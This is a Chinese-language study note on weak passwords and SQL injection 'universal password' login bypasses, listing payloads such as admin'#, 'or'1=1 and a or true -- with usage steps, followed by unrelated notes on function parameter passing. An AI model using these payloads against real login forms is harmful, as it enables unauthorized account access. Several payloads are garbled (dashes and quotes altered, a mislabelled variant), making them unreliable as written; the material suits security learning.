弱口令: 是容易被猜测或破解的密码,安全性低
常见的弱口令:password、123456、qwerty,弱口令就等于弱密码
1.假如用户名admin就填上admin'#,密码随便输入123456
#在SQL中是注释符,其后面内容不起作用,其实只会在数据库中查询用户名,不用密码,所以密码可以随便写
参数可以用单引号包裹,双引号包裹甚至不包裹,所以万能密码有三种形式
数值型admin # 单引号字符串型admin'# 双引号字符串行admin''#
实际上利用了注释#的特性,由于--也是SQL的注释,又多了三种
数值型admin-- a单引号字符串型admin'-- a双引号字符串行admin''-- a
2.'or'1=1'# 注释符被过滤时,账号与密码都输入'or'1=1或者'or'1=1''
3.数值型万能账号
a or true # a or 1 # a or 1=1 # a or true – a a or 1 – a a or 1=1 – a
单引号字符型万能密码
a’ or true # a’ or 1 # a’ or 1=1 # a’ or true --a a’ or 1 – a a’ or 1=1 – a
双引号字符型万能密码
a" or true # a" or 1 # a" or 1=1 # a" or true – a a" or 1 – a a" or 1=1 – a
万能账号的使用
账号输入: a or true #
密码随便输入,比如:123456
数值型万能密码
admin # admin – a
单引号字符串型万能密码
admin’ # admin’ – a
双引号字符串型万能密码
admin” # admin" – a
万能密码的使用
用户名输入: admin’ #
密码随便输入,比如: 123456
编程中的传参 :
是指在调用函数或方法时,将数据或变量传递给函数或方法的过程。传参的目的是为了让函数或方法能够处理特定的数据,并返回相应的结果。
函数传参 有3种方式 ,传值,传址,传引
形参: 出现在函数定义中,在整个函数体内都可以使用, 离开该函数则不能使用。
实参 :出现在主调函数中,进入被调函数后,实参变量也不能使用。
传值 :把A的数值传到B,改变B,A不会跟着变,B存的是跟A一样的值;
传址: 传址时同样新开辟一个空间,但不同的是将所用数据空间的内存地址存在新开辟的空间中,函数在数据处理过程中由于是地址(指针),即对源数据进行操作,操作后结果影响原数据。